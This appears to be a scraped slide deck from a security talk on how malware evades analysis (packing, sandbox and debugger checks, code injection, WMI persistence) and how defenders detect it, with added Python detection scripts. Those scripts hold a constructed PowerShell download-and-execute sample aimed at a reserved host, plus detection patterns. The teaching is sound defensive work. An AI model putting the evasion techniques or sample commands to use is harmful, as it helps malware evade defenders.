Let’s talk technical: Malware Evasion and Detection
James Haughom Jr
XOR Security
Who am I?
• Self taught cyber professional
• Background in malware analysis/RE
• XOR Security!
• Windowless room for 10+ hours a day (SOClife)
• Two degrees in music (totally relevant)
• Shameless plug: http://rinseandrepeatanalysis.blogspot.com/
• Contact info: james.haughom@xorsecurity.com
Agenda
• Topics:
• Malware Evasion Techniques
• Detection Techniques for Defenders
• Why?
• Evasive malware is becoming more prevalent
• Defenders must follow suit
• Bye bye, signature-based detection!
• What I pray to God you get out of it:
• Thinking outside of the box for detection
• Learn about some of malware’s inner workings
Malware – all shapes and sizes
PEs, PowerShell, and Shellcode.....oh my!
Microsoft Office Doc Malware
Weaponization:
• VBA Macros / OLE Objects
• DDE
• Embedded link/shortcut files (.settingcontent-ms, .iqy, .slk)
PDF Malware
Weaponization:
• /JavaScript
• Embedded files (.exe, .settingcontent-ms, etc…)
• Phishing links (boring.)
RTF Malware
Weaponization:
• OLE Objects (RTF does not support macros)
• Embedded files (.exe, shellcode, etc…)
• Abuses native Windows executables (powershell, regsvr32, bitsadmin, certutil, etc…)
PowerShell, JavaScript, Shellcode
Weaponization:
• Usually embedded in other binaries
• Used both for delivery and as persistent payloads
• Leveraged by fileless and evasive malware
• Shellcode = position-independent code (PIC), ready to run on the CPU as-is
Portable Executables
• .exe / .dll
• Full persistent payload on disk
• Most robust form of malware
• Borland, C, C++, etc…
• Abuse WinAPI
• Native Windows functions = API calls
• Ransomware, backdoors, trojans, worms, keyloggers, rootkits, etc…
(diagram) Malware.exe (process)
  imports from Kernel32.dll: CreateFile, CreateProcess, CreateThread
  imports from ws2_32.dll: socket, send, recv
C:\Windows\System32
  Kernel32.dll (export)
  ws2_32.dll (export)
Evasion
on disk, in memory, in transit..
Static Evasion - Packing
• .EXEs / .DLLs = PACKED
• Packing is a subset/type of obfuscation
• Compression
• VMProtect, Themida, Armadillo, etc..
• High entropy/low import count
• Weird static properties
• APIs:
• LoadLibrary
• GetProcAddress
• VirtualAlloc
• RtlDecompressBuffer
• Hides functionality of the malware
• Hides strings, imports, etc…
• Evade AV
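As an added example (not from the slides), the entropy / import-count heuristic above as a small Python triage script: it computes Shannon entropy per section and flags samples that combine high-entropy sections with a stub-sized import table. The thresholds and the two PE-like samples are constructed for illustration.

```python
import hashlib
import math
from collections import Counter

# Thresholds are assumptions chosen for illustration, not figures from the slides:
# compressed or encrypted data usually sits well above ~7.2 bits/byte, and a packed
# PE tends to import only the handful of functions its unpacking stub needs.
ENTROPY_THRESHOLD = 7.2
IMPORT_COUNT_THRESHOLD = 8
# APIs the slides list as typical of an unpacking stub.
STUB_APIS = {"LoadLibraryA", "LoadLibraryW", "GetProcAddress",
             "VirtualAlloc", "RtlDecompressBuffer"}


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy of a byte string in bits per byte (0.0 to 8.0)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def packing_indicators(sections, imports):
    """Score a PE-like sample.

    sections: dict mapping section name -> raw section bytes
    imports:  list of imported function names from the import table
    Returns (verdict, reasons); two or more indicators together are treated
    as "likely packed".
    """
    reasons = []
    for name, data in sections.items():
        ent = shannon_entropy(data)
        if ent >= ENTROPY_THRESHOLD:
            reasons.append(f"section {name}: entropy {ent:.2f} bits/byte")
    if len(imports) <= IMPORT_COUNT_THRESHOLD:
        reasons.append(f"low import count ({len(imports)})")
        stub = sorted(STUB_APIS.intersection(imports))
        if stub:
            reasons.append("imports look like an unpacking stub: " + ", ".join(stub))
    verdict = "likely packed" if len(reasons) >= 2 else "probably not packed"
    return verdict, reasons


def pseudo_random_bytes(n, seed=b"constructed"):
    """Deterministic high-entropy bytes (SHA-256 chain) standing in for a
    compressed/encrypted section; constructed sample data, not a real PE."""
    out, block = bytearray(), seed
    while len(out) < n:
        block = hashlib.sha256(block).digest()
        out += block
    return bytes(out[:n])


# Constructed samples: an unpacked-looking PE with a normal import table, and a
# packed-looking one whose sections are opaque and whose imports are only the stub's.
PLAIN_SAMPLE = {
    "sections": {".text": b"push ebp; mov ebp, esp; sub esp, 0x40; " * 100,
                 ".data": b"Software\\Microsoft\\Windows\\CurrentVersion\\Run" * 20},
    "imports": ["CreateFileW", "ReadFile", "WriteFile", "CreateProcessW", "CreateThread",
                "RegOpenKeyExW", "RegSetValueExW", "socket", "connect", "send", "recv",
                "GetProcAddress", "LoadLibraryA", "ExitProcess", "Sleep", "GetTickCount"],
}
PACKED_SAMPLE = {
    "sections": {".text": pseudo_random_bytes(4096),
                 "UPX1": pseudo_random_bytes(2048, b"second section")},
    "imports": ["LoadLibraryA", "GetProcAddress", "VirtualAlloc", "VirtualProtect"],
}

if __name__ == "__main__":
    for label, sample in (("plain", PLAIN_SAMPLE), ("packed", PACKED_SAMPLE)):
        verdict, reasons = packing_indicators(sample["sections"], sample["imports"])
        print(f"{label}: {verdict}")
        for reason in reasons:
            print("  -", reason)
```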
Static Evasion - Obfuscation
• Non-PE malware is technically not packed, but obfuscated:
• Garbage code
• Pointless arithmetic
• Concatenation of important strings at runtime
• Randomized variable names
• Unused variables/functions
• Multiple layers/languages
• Replace(), chr(), Vbkey()
• Simple encoding (XOR, Base64, Hex)
• Compression (PowerShell)
• Randomized order of functions
Trojanization
• Masquerading as a system process:
• Svchost.exe running out of AppData
• Running as a service:
• Background service
• Svchost.exe with malicious dll
• Masquerading as downloaded software
Environment-aware: Process activity
• FindWindow API call
• GetModuleHandle
• List running processes and compare:
1. Get a process listing: CreateToolhelp32Snapshot, EnumProcesses
2. Iterate through the list of processes: Process32First, Process32Next
3. Compare results of process listing against known names:
• Virtualization:
• VBoxService.exe, vmtoolsd.exe, vmwareuser.exe
• Malware Lab:
• procmon.exe, procexp.exe, wireshark.exe
• Debuggers:
• ollydbg.exe, windbg.exe, x64dbg.exe
(screenshots: FindWindow, GetModuleHandleA)
File System / Registry
Query Registry:
• Virtualization:
• HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 "Identifier"; "VMWARE"
• HKLM\SOFTWARE\VMware, Inc.\VMware Tools
• HKLM\HARDWARE\Description\System "SystemBiosVersion"; "VMWARE"
• HKLM\HARDWARE\Description\System "SystemBiosVersion"; "VBOX"
• HKLM\SOFTWARE\Oracle\VirtualBox Guest Additions
• HKLM\HARDWARE\ACPI\DSDT\VBOX
• Malware Lab:
• Residue from non-standalone tools
Traverse File System:
• Virtualization:
• C:\WINDOWS\system32\drivers\VBoxMouse.sys
• C:\WINDOWS\system32\vboxhook.dll
• C:\WINDOWS\system32\vboxdisp.dll
• C:\Windows\system32\drivers\vmmouse.sys
• C:\system32\drivers\vmhgfs.sys
• Malware Lab:
• Installation files, dependencies, DLLs
• Wireshark, Process Hacker, etc…
• Sandbox:
• Lack of data on the file system
• AV:
• Installation files, dependencies, DLLs
(screenshots: RegOpenKey, GetCommandLine)
Hardware
• Detect Virtualization/Lab/Sandbox:
• Common MAC addresses
• VirtualBox - 08:00:27
• Vmware - 00:0C:29, 00:1C:14, 00:50:56, or 00:05:69
• Check RAM / core count:
• If the hardware profile looks like a lab or sandbox, may exit
Sandbox
• Detect Sandbox:
• Check system time
• Successful internet access
• HttpSendRequest → google.com
• Mouse/keyboard activity
• Empty clipboard
• Sleep loop
• Malware name
• Some sandboxes name the malware its hash when executing
• Some sandboxes name it malware.exe
Debuggers
• Detect Debuggers:
• Timing:
• GetTickCount – if (GetTickCount1 – GetTickCount2 > x) { EXIT }
• GetSystemTime – if (GetSystemTime1 – GetSystemTime2 > x) { EXIT }
• WinAPI calls
• IsDebuggerPresent, OutputDebugString, CheckRemoteDebuggerPresent, NtQueryInformationProcess
• Manually checking flags within data structures
• PEB – fs:[0x30] + 0x2 (x86) / gs:[0x60] + 0x2 (x64) = BeingDebugged
• SeDebugPrivilege flag
• Check running processes for common debuggers
• ollydbg, x64dbg, immunity, etc….
• FindWindow
• Parameter of ollydbg, x64dbg, etc…
• Abuse of the Structured Exception Handler
• TLS callback functions
• The Red Pill
Miscellaneous Evasion
• Cleaning up after itself:
• Config files, dependencies, residue, artifacts, itself, timestomping, etc....
• Evading signatures:
• Randomly generate filenames or registry values
• DGA – Domain Generation Algorithm
• Client/server-side
• Hash or refer to sections of itself to detect tampering
• arguments.callee in JS
• PEs that hash sections of own code
• Hide from task manager/tasklist
• Unlink itself from the doubly linked list → PsActiveProcessHead
• Behavior dependent on other running processes
• E.g. coinminer looking for task manager
• DLL Load Order Hijacking
(screenshots: before timestomp / after timestomp)
Code injection
• Different flavors:
• Process Hollowing + Injection
• CreateProcess (suspended)…
• CreationFlags = 0x00000004 (CREATE_SUSPENDED)
• UnmapViewOfSection …
• WriteProcessMemory…
• ResumeThread…
• DLL injection
• VirtualAllocEx
• WriteProcessMemory
• CreateRemoteThread
• LoadLibrary
• API Hooking
• Interception/interference of code
• IAT Hooking
• Inline Hooking (trampoline)
• Shellcode injection
• Unpacking technique
• Process Doppelganging
Malware analysis for hedgehogs - http://struppigel.blogspot.com/2017/07/process-injection-info-graphic.html
(screenshots: CreateRemoteThread, Inline Hooking)
Evasion in transit
• Blending in with expected traffic:
• Heavily used ports (53, 80, 443)
• Benign-looking UserAgent
• Less monitored by tools:
• DNS is common for phoning home
• Hiding comms:
• Encryption
• XOR
• Simple encoding
• DGA
• C2 redundancy
• Referrer loops through domains until 200
https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-G.PDF
Fileless…ish malware
• Payload in the registry
• Scripts passed to native Windows executables
• No files dropped to file system
• PowerShell / JS
• WinAPI abuse
• Inject shellcode
• Uses Run keys for persistence
• Examples
• Kovter
• Poweliks
• Misfox
Fileless…ish malware cont’d
• WMI
• Payload in WMI repository
• No files dropped to file system
• Persist across reboots
• AV/EDRs will not see it
• Persistence = Permanent Event Subscription (root\subscription)
• Requires:
• EventFilter (trigger / condition)
• EventConsumer (action / payload)
• FilterToConsumerBinding (binds the two)
• Examples:
• Poshspy
• Hammertoss
Detection
catch me if you can
Detecting Delivery - host
• Most common delivery methods:
• Malicious email attachment
• Drive by download
• Parent/child process relationship anomalies:
Email Attachment:
• Process chain: Outlook.exe > winword.exe > powershell.exe > malware.exe
• Detection: Office applications spawning powershell.exe, cmd.exe, wscript.exe, etc….
• Tool(s) for detection: Carbon Black, Tanium, Windows Event Logs (4688)
Drive by download:
• Process chain: iexplore.exe > malware.exe
• Detection: Browser spawning unexpected process (whitelist)
• Tool(s) for detection: Carbon Black, Tanium, Windows Event Logs (4688)
Detection - network
• UserAgent anomalies:
• One-offs
• Slight deviations from expected UAs
• System processes that shouldn’t be calling out
• certutil, bitsadmin, regsvr32, mshta, etc…
• Lack of UserAgent
• Favorite of malware authors = PowerShell Net.WebClient class + Download(File|String) → blank UA!
(screenshots of UserAgents: PowerShell Net.WebClient class (blank), BITSAdmin, iexplore.exe, Kovter)
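An added example, not from the slides: the UserAgent anomaly classes above (blank UA, one-offs, slight deviations from the fleet UA, and calls from system utilities) as Python run over constructed proxy log lines. The log format, the baseline rule (a UA counts as expected once seen on at least two hosts), the 0.9 similarity cut-off and the utility UA prefixes are assumptions to tune against your own environment.

```python
import difflib
import re
from collections import Counter, defaultdict

# Constructed proxy log format: timestamp host "user-agent" url status
LOG_RX = re.compile(r'^(\S+) (\S+) "([^"]*)" (\S+) (\d{3})$')

# UA prefixes of Windows utilities the slides name as suspicious callers
# ("Microsoft BITS/" is the BITS client; certutil fetches through CryptoAPI).
# Starting list only; verify against your own baseline.
SYSTEM_UTILITY_UA_PREFIXES = ("Microsoft BITS/", "Microsoft-CryptoAPI/")

CHROME_UA = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
             "(KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36")

# Constructed sample lines, not real traffic (203.0.113.0/24 and 198.51.100.0/24
# are documentation ranges).
LOG_LINES = [
    f'2019-03-01T10:00:01 host1 "{CHROME_UA}" http://intranet.example/ 200',
    f'2019-03-01T10:00:05 host2 "{CHROME_UA}" http://intranet.example/news 200',
    f'2019-03-01T10:00:09 host3 "{CHROME_UA}" http://intranet.example/ 200',
    f'2019-03-01T10:01:30 host4 "{CHROME_UA}" http://www.example.com/ 200',
    # blank UA: the Net.WebClient Download(File|String) pattern from the slides
    '2019-03-01T10:02:11 host3 "" http://203.0.113.5/a.ps1 200',
    # slight deviation from the fleet UA (last character dropped)
    f'2019-03-01T10:03:40 host2 "{CHROME_UA[:-1]}" http://198.51.100.7/gate.php 200',
    # system utility calling out
    '2019-03-01T10:05:00 host4 "Microsoft BITS/7.8" http://203.0.113.5/x.exe 200',
    # one-off UA seen nowhere else in the fleet
    '2019-03-01T10:06:12 host1 "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" http://198.51.100.7/c2 404',
]


def parse(lines):
    """Parse log lines into dicts; lines that do not match the format are skipped."""
    records = []
    for line in lines:
        m = LOG_RX.match(line)
        if m:
            ts, host, ua, url, status = m.groups()
            records.append({"ts": ts, "host": host, "ua": ua, "url": url, "status": int(status)})
    return records


def baseline_uas(records, min_hosts=2):
    """UAs seen on at least min_hosts distinct hosts form the fleet baseline."""
    hosts_by_ua = defaultdict(set)
    for r in records:
        if r["ua"]:
            hosts_by_ua[r["ua"]].add(r["host"])
    return {ua for ua, hosts in hosts_by_ua.items() if len(hosts) >= min_hosts}


def classify(ua, baseline, counts, deviation_ratio=0.9):
    """Return an anomaly label for one UA, or None when it is in the baseline."""
    if ua == "":
        return "blank-ua"
    if ua in baseline:
        return None
    if ua.startswith(SYSTEM_UTILITY_UA_PREFIXES):
        return "system-utility-ua"
    closest = max((difflib.SequenceMatcher(None, ua, b).ratio() for b in baseline), default=0.0)
    if closest >= deviation_ratio:
        return "near-duplicate-ua"   # looks like the fleet UA but is not identical
    if counts[ua] == 1:
        return "one-off-ua"
    return "rare-ua"


def find_anomalies(records, min_hosts=2):
    """Returns (host, label, ua, url) for every record whose UA is anomalous."""
    baseline = baseline_uas(records, min_hosts)
    counts = Counter(r["ua"] for r in records)
    findings = []
    for r in records:
        label = classify(r["ua"], baseline, counts)
        if label:
            findings.append((r["host"], label, r["ua"] or "<blank>", r["url"]))
    return findings


if __name__ == "__main__":
    for host, label, ua, url in find_anomalies(parse(LOG_LINES)):
        print(f"{host}: {label}: {ua} -> {url}")
```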
Detection: Process Activity
• System processes behaving badly:
• Running out of incorrect directory
• Running under incorrect parent process
• Anomalous DLLs
• Unlinked DLLs
• Anomalous network connections from system processes
• DLL Load Order Hijacking
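An added example, not from the slides, that covers both the parent/child rules from the delivery slide (Office application spawning a script host, browser spawning a non-whitelisted child) and the wrong-directory / wrong-parent checks above. It runs in Python over constructed process-creation records of the kind a 4688 event or an EDR process feed provides; the browser child whitelist and the expected-parent table are assumptions.

```python
import ntpath

# Process names the slides use for the parent/child rules. The browser child
# whitelist and the expected-parent table are assumptions for this example;
# tune them to your own environment.
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "regsvr32.exe", "certutil.exe", "bitsadmin.exe"}
BROWSERS = {"iexplore.exe", "chrome.exe", "firefox.exe"}
BROWSER_CHILD_WHITELIST = BROWSERS | {"ielowutil.exe"}
SYSTEM_PROCESSES = {"svchost.exe", "lsass.exe", "csrss.exe", "services.exe", "winlogon.exe"}
SYSTEM_DIR = r"c:\windows\system32"
EXPECTED_PARENT = {"svchost.exe": "services.exe"}

# Constructed process-creation records (the fields a 4688 event or an EDR
# process event gives you); pids and paths are made up for the example.
EVENTS = [
    {"pid": 100, "ppid": 4, "image": r"C:\Windows\System32\services.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\svchost.exe"},
    {"pid": 300, "ppid": 1, "image": r"C:\Windows\explorer.exe"},
    {"pid": 400, "ppid": 300, "image": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE"},
    {"pid": 500, "ppid": 400, "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"},
    {"pid": 600, "ppid": 500, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"pid": 700, "ppid": 600, "image": r"C:\Users\bob\AppData\Roaming\malware.exe"},
    {"pid": 800, "ppid": 300, "image": r"C:\Program Files\Internet Explorer\iexplore.exe"},
    {"pid": 900, "ppid": 800, "image": r"C:\Users\bob\Downloads\malware.exe"},
    {"pid": 1000, "ppid": 300, "image": r"C:\Users\bob\AppData\Roaming\svchost.exe"},
]


def image_name(path):
    """Lower-cased file name of a Windows image path (ntpath works on any OS)."""
    return ntpath.basename(path).lower()


def build_index(events):
    return {e["pid"]: e for e in events}


def ancestry(index, pid):
    """Walk parent links upwards; returns the chain root -> pid as image names."""
    chain, seen = [], set()
    while pid in index and pid not in seen:
        seen.add(pid)
        chain.append(image_name(index[pid]["image"]))
        pid = index[pid]["ppid"]
    return list(reversed(chain))


def analyze(events):
    """Apply the slides' rules; returns (pid, rule, detail) tuples."""
    index = build_index(events)
    findings = []
    for e in events:
        child = image_name(e["image"])
        parent_ev = index.get(e["ppid"])
        parent = image_name(parent_ev["image"]) if parent_ev else None
        chain = " > ".join(ancestry(index, e["pid"]))
        # Email attachment pattern: Office app -> script host
        if parent in OFFICE_APPS and child in SCRIPT_HOSTS:
            findings.append((e["pid"], "office-app-spawned-script-host", chain))
        # Drive-by pattern: browser -> anything not on the whitelist
        if parent in BROWSERS and child not in BROWSER_CHILD_WHITELIST:
            findings.append((e["pid"], "browser-spawned-unexpected-child", chain))
        # System process running out of the wrong directory
        if child in SYSTEM_PROCESSES and ntpath.dirname(e["image"]).lower() != SYSTEM_DIR:
            findings.append((e["pid"], "system-process-wrong-directory", e["image"]))
        # System process under the wrong parent
        expected = EXPECTED_PARENT.get(child)
        if expected and parent != expected:
            findings.append((e["pid"], "system-process-wrong-parent", f"parent={parent}"))
    return findings


if __name__ == "__main__":
    for pid, rule, detail in analyze(EVENTS):
        print(f"pid {pid}: {rule}: {detail}")
```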
Execution Detection: Code Injection
• Anomalous process/thread activity
• Cross-process activity
• Remote thread activity
• Anomalous regions of memory (rights)
• Memory protection constants
• Read, Copy, Write, Execute, etc…
• Code injection protection constants:
• RWX
• RCX
• False positives (FPs) = csrss.exe, lsass.exe, svchost.exe
https://gist.github.com/jaredcatkinson/23905d34537ce4b5b1818c3e6405c1d2
Pattern Matching - Yara
• Scanning file systems/memory with Yara signatures
• Pattern match specific malware families or profile malware based off of APIs/strings
• AV detections are often proprietary; you don’t know what specifically makes them fire
• At the perimeter or routine scans
Detecting Persistence: Favorites
• Monitoring heavily used persistence mechanisms:
• (HKLM|HKCU)\Software\Microsoft\Windows\CurrentVersion\Run
• HKLM\SYSTEM\CurrentControlSet\Services
• These autorun locations should not be modified often (especially not the values under HKLM)
• Scheduled Tasks
• WMI
Leveraging WMI
• Use at scale for cheap (sysadmin style)
• Lower visibility than most AV/EDR
• Level the playing field
• Anomalous process privileges
• WMI spawns processes under PPID wmiprvse.exe
WMI via PS
• Check for:
• Persistence (FilterToConsumerBinding):
• gwmi -Namespace root\subscription -Class __FilterToConsumerBinding
• Trigger/Condition (EventFilter):
• gwmi -Namespace root\subscription -Class __EventFilter
• Action/Payload (EventConsumer):
• gwmi -Namespace root\subscription -Class __EventConsumer
• Anomalous namespaces:
• gwmi -Namespace root -Class __NameSpace | select name
• Namespace = database of classes/instances
• Anomalous classes:
• gwmi -Namespace [NameSpace] -List
• Class = managing specific objects
Misc Detections
• Clean up:
• Event ID 1102: The audit log was cleared
• PowerShell auditing
• Get-WinEvent -LogName 'Windows PowerShell'
• -EncodedCommand / -enc / -e
• -nop
• Net.WebClient
• '[a-zA-Z0-9/+=]{20,}' (long base64 runs)
• -ExecutionPolicy bypass
• Process relationships
• Sweep for other stuff:
• Mutexes, registry values, weird file types (.iqy, .slk, etc..), .pf for known bad (malware.exe.xxxx.pf)
• Correlate events:
• JS followed by .exe download
• .exe download + weird UA
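An added example, not from the slides: the PowerShell command-line indicators listed above as regexes, with any -EncodedCommand payload decoded (base64 of UTF-16LE) and re-scanned for Net.WebClient. The sample command lines are constructed, and the scoring thresholds are assumptions.

```python
import base64
import re

# Indicators the slides call out, as regexes over a process command line.
# "-e", "-ec" and "-enc" are the short prefixes PowerShell accepts for
# -EncodedCommand; "-ep" and "-ex" likewise for -ExecutionPolicy.
BASE64_RX = re.compile(r"[a-zA-Z0-9/+=]{20,}")
NET_WEBCLIENT_RX = re.compile(r"(?i)net\.webclient")
INDICATORS = [
    ("encoded-command", re.compile(r"(?i)(?:^|\s)-e(?:c|nc|ncodedcommand)?\s")),
    ("no-profile", re.compile(r"(?i)(?:^|\s)-nop(?:rofile)?\b")),
    ("execution-policy-bypass", re.compile(r"(?i)-e(?:p|x(?:ecutionpolicy)?)\s+bypass\b")),
    ("net-webclient", NET_WEBCLIENT_RX),
    ("base64-blob", BASE64_RX),
]


def decode_encoded_command(blob):
    """-EncodedCommand carries base64 of UTF-16LE text. Returns the text, or
    None when the blob is not valid base64 or does not decode to text."""
    try:
        text = base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None
    if all(ch.isprintable() or ch.isspace() for ch in text):
        return text
    return None


def triage(cmdline):
    """Match the indicators, decode any long base64 run and re-scan the decoded
    text for Net.WebClient. Returns hits, decoded text, score and verdict."""
    hits = [name for name, rx in INDICATORS if rx.search(cmdline)]
    decoded = None
    for blob in BASE64_RX.findall(cmdline):
        text = decode_encoded_command(blob)
        if text:
            decoded = text
            if NET_WEBCLIENT_RX.search(text) and "net-webclient" not in hits:
                hits.append("net-webclient (decoded)")
    score = len(hits)
    # Thresholds are assumptions: -nop alone is weak, several indicators together are not.
    verdict = "high" if score >= 3 else "review" if score else "none"
    return {"hits": hits, "decoded": decoded, "score": score, "verdict": verdict}


def encode_for_fixture(script):
    """Inverse of decode_encoded_command; used only to build the sample below."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample command lines (example.invalid is a reserved name).
SAMPLE_SCRIPT = "(New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"
SAMPLES = [
    "powershell.exe -nop -w hidden -ExecutionPolicy bypass -enc " + encode_for_fixture(SAMPLE_SCRIPT),
    "powershell.exe -NoProfile -Command Get-Service",
    "powershell.exe -Command \"(New-Object Net.WebClient).DownloadFile('http://example.invalid/x.exe','C:\\Users\\Public\\x.exe')\"",
]

if __name__ == "__main__":
    for cmd in SAMPLES:
        result = triage(cmd)
        print(result["verdict"], result["hits"])
        if result["decoded"]:
            print("  decoded:", result["decoded"])
```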
Thank you!
https://www.linkedin.com/in/james-haughom-jr-248748129
http://rinseandrepeatanalysis.blogspot.com
james.haughom@xorsecurity.com
These slides can be found on my blog or linkedin!

More Related Content

What's hot

Basic malware analysis
Basic malware analysisBasic malware analysis
Basic malware analysis
securityxploded
 
Monitoring using Prometheus and Grafana
Monitoring using Prometheus and GrafanaMonitoring using Prometheus and Grafana
Monitoring using Prometheus and Grafana
Arvind Kumar G.S
 
IBM Qradar & resilient
IBM Qradar & resilientIBM Qradar & resilient
IBM Qradar & resilient
Prime Infoserv
 
Modern vs. Traditional SIEM
Modern vs. Traditional SIEM Modern vs. Traditional SIEM
Modern vs. Traditional SIEM
Alert Logic
 
CyCon 2019 - A Day in the Life of a Reverse Engineer
CyCon 2019 - A Day in the Life of a Reverse EngineerCyCon 2019 - A Day in the Life of a Reverse Engineer
CyCon 2019 - A Day in the Life of a Reverse Engineer
James Haughom Jr
 
Soc analyst course content v3
Soc analyst course content v3Soc analyst course content v3
Soc analyst course content v3
ShivamSharma909
 
SIEM Architecture
SIEM ArchitectureSIEM Architecture
SIEM Architecture
Nishanth Kumar Pathi
 
Hacker Halted 2016 - How to get into ICS security
Hacker Halted 2016 - How to get into ICS securityHacker Halted 2016 - How to get into ICS security
Hacker Halted 2016 - How to get into ICS security
Chris Sistrunk
 
Threat hunting - Every day is hunting season
Threat hunting - Every day is hunting seasonThreat hunting - Every day is hunting season
Threat hunting - Every day is hunting season
Ben Boyd
 
Threat Hunting Procedures and Measurement Matrice
Threat Hunting Procedures and Measurement MatriceThreat Hunting Procedures and Measurement Matrice
Threat Hunting Procedures and Measurement Matrice
Vishal Kumar
 
Hunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows EnvironmentHunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows Environment
Teymur Kheirkhabarov
 
Iso 27001 foundation sample slides
Iso 27001 foundation sample slidesIso 27001 foundation sample slides
Iso 27001 foundation sample slides
Stratos Lazaridis
 
Detecting WMI Exploitation v1.1
Detecting WMI Exploitation v1.1Detecting WMI Exploitation v1.1
Detecting WMI Exploitation v1.1
Michael Gough
 
Cyber threat Intelligence and Incident Response by:-Sandeep Singh
Cyber threat Intelligence and Incident Response by:-Sandeep SinghCyber threat Intelligence and Incident Response by:-Sandeep Singh
Cyber threat Intelligence and Incident Response by:-Sandeep Singh
OWASP Delhi
 
BSidesLV 2016 - Powershell - Hunting on the Endpoint - Gerritz
BSidesLV 2016 - Powershell - Hunting on the Endpoint - GerritzBSidesLV 2016 - Powershell - Hunting on the Endpoint - Gerritz
BSidesLV 2016 - Powershell - Hunting on the Endpoint - Gerritz
Christopher Gerritz
 
Threat Hunting with Splunk Hands-on
Threat Hunting with Splunk Hands-onThreat Hunting with Splunk Hands-on
Threat Hunting with Splunk Hands-on
Splunk
 
Introduction to QRadar
Introduction to QRadarIntroduction to QRadar
Introduction to QRadar
PencilData
 
Security Information Event Management - nullhyd
Security Information Event Management - nullhydSecurity Information Event Management - nullhyd
Security Information Event Management - nullhyd
n|u - The Open Security Community
 
Hunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureHunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows Infrastructure
Sergey Soldatov
 
Lesson 3- Effectiveness of IDPS
Lesson 3- Effectiveness of IDPSLesson 3- Effectiveness of IDPS
Lesson 3- Effectiveness of IDPS
MLG College of Learning, Inc
 

What's hot (20)

Basic malware analysis
Basic malware analysisBasic malware analysis
Basic malware analysis
 
Monitoring using Prometheus and Grafana
Monitoring using Prometheus and GrafanaMonitoring using Prometheus and Grafana
Monitoring using Prometheus and Grafana
 
IBM Qradar & resilient
IBM Qradar & resilientIBM Qradar & resilient
IBM Qradar & resilient
 
Modern vs. Traditional SIEM
Modern vs. Traditional SIEM Modern vs. Traditional SIEM
Modern vs. Traditional SIEM
 
CyCon 2019 - A Day in the Life of a Reverse Engineer
CyCon 2019 - A Day in the Life of a Reverse EngineerCyCon 2019 - A Day in the Life of a Reverse Engineer
CyCon 2019 - A Day in the Life of a Reverse Engineer
 
Soc analyst course content v3
Soc analyst course content v3Soc analyst course content v3
Soc analyst course content v3
 
SIEM Architecture
SIEM ArchitectureSIEM Architecture
SIEM Architecture
 
Hacker Halted 2016 - How to get into ICS security
Hacker Halted 2016 - How to get into ICS securityHacker Halted 2016 - How to get into ICS security
Hacker Halted 2016 - How to get into ICS security
 
Threat hunting - Every day is hunting season
Threat hunting - Every day is hunting seasonThreat hunting - Every day is hunting season
Threat hunting - Every day is hunting season
 
Threat Hunting Procedures and Measurement Matrice
Threat Hunting Procedures and Measurement MatriceThreat Hunting Procedures and Measurement Matrice
Threat Hunting Procedures and Measurement Matrice
 
Hunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows EnvironmentHunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows Environment
 
Iso 27001 foundation sample slides
Iso 27001 foundation sample slidesIso 27001 foundation sample slides
Iso 27001 foundation sample slides
 
Detecting WMI Exploitation v1.1
Detecting WMI Exploitation v1.1Detecting WMI Exploitation v1.1
Detecting WMI Exploitation v1.1
 
Cyber threat Intelligence and Incident Response by:-Sandeep Singh
Cyber threat Intelligence and Incident Response by:-Sandeep SinghCyber threat Intelligence and Incident Response by:-Sandeep Singh
Cyber threat Intelligence and Incident Response by:-Sandeep Singh
 
BSidesLV 2016 - Powershell - Hunting on the Endpoint - Gerritz
BSidesLV 2016 - Powershell - Hunting on the Endpoint - GerritzBSidesLV 2016 - Powershell - Hunting on the Endpoint - Gerritz
BSidesLV 2016 - Powershell - Hunting on the Endpoint - Gerritz
 
Threat Hunting with Splunk Hands-on
Threat Hunting with Splunk Hands-onThreat Hunting with Splunk Hands-on
Threat Hunting with Splunk Hands-on
 
Introduction to QRadar
Introduction to QRadarIntroduction to QRadar
Introduction to QRadar
 
Security Information Event Management - nullhyd
Security Information Event Management - nullhydSecurity Information Event Management - nullhyd
Security Information Event Management - nullhyd
 
Hunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureHunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows Infrastructure
 
Lesson 3- Effectiveness of IDPS
Lesson 3- Effectiveness of IDPSLesson 3- Effectiveness of IDPS
Lesson 3- Effectiveness of IDPS
 

Similar to Let's Talk Technical: Malware Evasion and Detection

BSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad GuysBSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad Guys
Joff Thyer
 
Logs, Logs, Logs - What you need to know to catch a thief
Logs, Logs, Logs - What you need to know to catch a thiefLogs, Logs, Logs - What you need to know to catch a thief
Logs, Logs, Logs - What you need to know to catch a thief
Michael Gough
 
CNIT 152: 12b Windows Registry
CNIT 152: 12b Windows RegistryCNIT 152: 12b Windows Registry
CNIT 152: 12b Windows Registry
Sam Bowne
 
